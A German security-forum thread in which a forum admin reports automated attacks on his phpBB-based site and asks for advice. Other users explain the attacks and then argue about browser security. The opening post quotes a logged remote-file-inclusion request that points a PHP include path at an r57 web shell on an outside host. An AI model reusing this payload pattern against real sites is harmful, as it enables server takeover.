Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
Webmaster-Security Fragen zur richtigen Serverkonfiguration oder Absicherung dynamischer Scripte gehören hier hinein.

Angriffe auf unser Forum Opensky.cc

Diskussion: Angriffe auf unser Forum Opensky.cc im Forum Webmaster-Security, in der Kategorie Security Area; Anzeige Unser Forum wird angegriffen, gestern 21 mal innert 4 Std. Grund der Angriffe ist vermutlich, dass wir uns mit ...

Antwort
Alt 16.06.07, 10:55   #1 (permalink)
 
Registriert seit: 29.12.06
opensky.cc Leistung: Facit NTK
Likes: 0
Arrow Angriffe auf unser Forum Opensky.cc

Anzeige

Unser Forum wird angegriffen, gestern 21 mal innert 4 Std.
Grund der Angriffe ist vermutlich, dass wir uns mit Spammerbanden angelegt haben.

Unsere Foren-Software: ORION based on phpBB

Beispiel eines Logeintrags von Caracker/Tracker:

16.06.2007, 00:15

/kb.php?sid=///includes/ kb_constants.php?module_root_path=http://secretagent.by.ru/r57.php?? libwww-perl/5.803 211.133.240.90

Auf http://secretagent.by.ru/r57.php?? liegt der Schaedling Backdoor BDS/PHP.Rst.F.3 (Avira) ACHTUNG: Der Infektionsversuch findet ohne eigene Aktion des Besuchers statt, der Aufruf der Seite genuegt!

Wir dokumentieren nun saemtliche Angriffe unter
http://forum.opensky.cc/viewtopic.php?t=93

Wir achten auf sichere Scripts und regelmaessige Updates. Unsere techn. Administratorin scheint die Situation bisher gut im Griff zu haben. Ich muss aber gestehen, dass ich von der Materie nichts verstehe.

Frage: Was koennen wir gegen die Angreifer unternehmen?

Herzlichen Dank zum Voraus
peter/admin opensky.cc

opensky.cc ist offline   Mit Zitat antworten
Alt 16.06.07, 12:32   #2 (permalink)
Administrator
 
Benutzerbild von Mackz
 
Registriert seit: 02.10.01
Mackz Leistung: Pentium IMackz Leistung: Pentium I
Likes: 30
Standard

Das sind einfach automatisierte Scripts die da ablaufen, wo pauschal nach Lücken gesucht wird um diese auszunutzen.
Wenn da nicht gerade ein Bug in dieser Richtung im phpbb existiert, habt ihr nichts zu befürchten.

Zitat:
gestern 21 mal innert 4 Std.
Na das ist doch garnichts. Du müsstest mal das Log vom Habo sehen.

Edit: Ich verschieb dich mal ins Webmaster-Security
__________________
RL sux big time... auch 2012!

Deleting pr0n is like killing your best friend

[HaBo] bei Facebook - Werde Fan
Mackz ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 16.06.07, 12:40   #3 (permalink)
Themenstarter
 
Registriert seit: 29.12.06
opensky.cc Leistung: Facit NTK
Likes: 0
Standard Danke Mackz!

Danke Mackz, das ist doch beruhigend. Wachsam bleiben wir aber auf jeden Fall!

Grss Peter
opensky.cc ist offline   Mit Zitat antworten
Alt 16.06.07, 16:21   #4 (permalink)
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

Zitat:
Auf http://secretagent.by.ru/r57.php?? liegt der Schaedling Backdoor BDS/PHP.Rst.F.3 (Avira) ACHTUNG: Der Infektionsversuch findet ohne eigene Aktion des Besuchers statt, der Aufruf der Seite genuegt!
Also ich kann nur ein PHP Script erkennen das als Backdoor fungiert sollte es auf einem Server
ausgeführt werden,allerdings stimmt deine Aussage das es Besucher infiziert afaik nicht.

mfg,
Xalon
Xalon ist offline   Mit Zitat antworten
Alt 16.06.07, 16:33   #5 (permalink)
fetzer
Guest
 
Likes:
Standard

Zitat:
Original von Xalon
Zitat:
Auf http://secretagent.by.ru/r57.php?? liegt der Schaedling Backdoor BDS/PHP.Rst.F.3 (Avira) ACHTUNG: Der Infektionsversuch findet ohne eigene Aktion des Besuchers statt, der Aufruf der Seite genuegt!
Also ich kann nur ein PHP Script erkennen das als Backdoor fungiert sollte es auf einem Server
ausgeführt werden,allerdings stimmt deine Aussage das es Besucher infiziert afaik nicht.

mfg,
Xalon
Virenprogramme schlagen trotzdem an, was die Vermutung aufkommen laesst, dass es den Computer infiziert. Alles, was die Virenprogramme erkennen ist jedoch nichts anderes als der Code der geparsten Datei, der allerdings nicht auf dem Clienten ausgefuehrt wird.
Es geht praktisch darum, dass, wenn man aufm Server solch ein Virenprogramm laufen hat, dass diese Datei eben als Schädling erkannt wird, was soweit ja auch korrekt ist.
  Mit Zitat antworten
Alt 16.06.07, 17:40   #6 (permalink)
Themenstarter
 
Registriert seit: 29.12.06
opensky.cc Leistung: Facit NTK
Likes: 0
Standard

Zitat:
Original von fetzer

Virenprogramme schlagen trotzdem an, was die Vermutung aufkommen laesst, dass es den Computer infiziert. Alles, was die Virenprogramme erkennen ist jedoch nichts anderes als der Code der geparsten Datei, der allerdings nicht auf dem Clienten ausgefuehrt wird.
Es geht praktisch darum, dass, wenn man aufm Server solch ein Virenprogramm laufen hat, dass diese Datei eben als Schädling erkannt wird, was soweit ja auch korrekt ist.
Aha, das ist der Grund. Tasaechlich hat mein Virenscanner angeschlagen, was ich dahingehend fehlinterpretierte, dass sich der Schaedling bereits auf meinem Rechner installieren wollte.

Danke fuer die Infos und schoenes Wochenende!

peter/opensky.cc
opensky.cc ist offline   Mit Zitat antworten
Alt 18.06.07, 10:11   #7 (permalink)
 
Registriert seit: 18.06.07
capi Leistung: Facit NTK
Likes: 0
Standard

Evtl. mach es Sinn einen sicheren Browser zu verwenden (Firefox ist gute wahr). Somit sind viele XSS Attachen nicht mehr möglich.
capi ist offline   Mit Zitat antworten
Alt 18.06.07, 13:55   #8 (permalink)
 
Registriert seit: 10.04.07
PapaJanus Leistung: Facit NTK
Likes: 0
Standard

Naja. Im Themenbereich Sicherheit ist Firefox wohl ein eher ungenügendes Beispiel... (http://mywebpages.comcast.net/Suppor....html#Security)

Grüße
PapaJanus ist offline   Mit Zitat antworten
Alt 18.06.07, 14:15   #9 (permalink)
Moderator
 
Benutzerbild von bitmuncher
 
Registriert seit: 30.09.06
bitmuncher Quadcorebitmuncher Quadcorebitmuncher Quadcorebitmuncher Quadcorebitmuncher Quadcorebitmuncher Quadcore
Likes: 443
Standard

Zitat:
Original von PapaJanus
Naja. Im Themenbereich Sicherheit ist Firefox wohl ein eher ungenügendes Beispiel... (http://mywebpages.comcast.net/Suppor....html#Security)

Grüße
Die Seite erzählt ja wohl mal nur Müll. Dort heißt es:

Zitat:
Reality - Firefox is anything but Secure with multiple unpatched vulnerabilities allowing exposure of sensitive data to local users. You only need one vulnerability to be insecure. Since Firefox v1.x was released, users have been exposed to over 150 security vulnerabilities and counting.
Als Quelle geben sie Secunia an, wo man dann folgendes lesen kann:

Zitat:
Secunia has issued a total of 43 Secunia advisories in 2003-2007 for Mozilla Firefox 1.x. Currently, 12% (5 out of 43) are marked as Unpatched with the most severe being rated Less critical
Fazit: Firefox hat 5 ungepatchte oder teilweise gepatchte Sicherheitslücken. Keine davon wird als besonders kritisch eingestuft.
__________________
Mein Blog - Mein Job - Diaspora

Der Ring uns zu knechten besteht aus 12 Sternen auf blauem Grund.

Neue Beiträge im Habo via Twitter - Das HaBo auf FB - Das HaBo bei G+
bitmuncher ist gerade online   Mit Zitat antworten
Alt 02.07.07, 23:59   #10 (permalink)
Themenstarter
 
Registriert seit: 29.12.06
opensky.cc Leistung: Facit NTK
Likes: 0
Standard Was iss denn das, bitte?

Kann mir einer sagen, was das script auf fogender URL ausfuehren soll - die Uebernahme des Servers?

h**p://lott.by/d?

Hab den Link mit Sternchen entschaerft

Danke und Gruss, Peter
opensky.cc ist offline   Mit Zitat antworten
Alt 03.07.07, 16:51   #11 (permalink)
Senior Member
 
Benutzerbild von Chakky
 
Registriert seit: 28.10.03
Chakky Leistung: 8086
Chakky eine Nachricht über ICQ schicken
Likes: 110
Standard RE: Was iss denn das, bitte?

Zitat:
Original von opensky.cc
Kann mir einer sagen, was das script auf fogender URL ausfuehren soll - die Uebernahme des Servers?

h**p://lott.by/d?

Hab den Link mit Sternchen entschaerft

Danke und Gruss, Peter
sieht mir nach ner php shell aus mal schnell drüber geflogen

kannst ja mal den irc server joinen^^

//hab noch im code ne email addy gefunden kannst ja reinschreiben^^

tipp zum besser lesen quelltxt anzeigen lassen
__________________
cu
Chakky

we are dreaming in digital
we are living in realtime
we are thinking in binary
we are talking in IP
welcome to our world
Chakky ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » Webmaster-Security » Angriffe auf unser Forum Opensky.cc
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Angriffe auf unser Forum Opensky.cc opensky.cc Off topic-Zone 2 16.06.07 12:40
Unser Hoohead? ThiEfGaRReT Off topic-Zone 3 20.09.06 23:49
Angriffe? bo2k (In)security allgemein 12 02.03.04 21:35
"Mysteriöse" Angriffe auf IIS Rushjo News & Ankündigungen 1 08.09.02 15:37


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61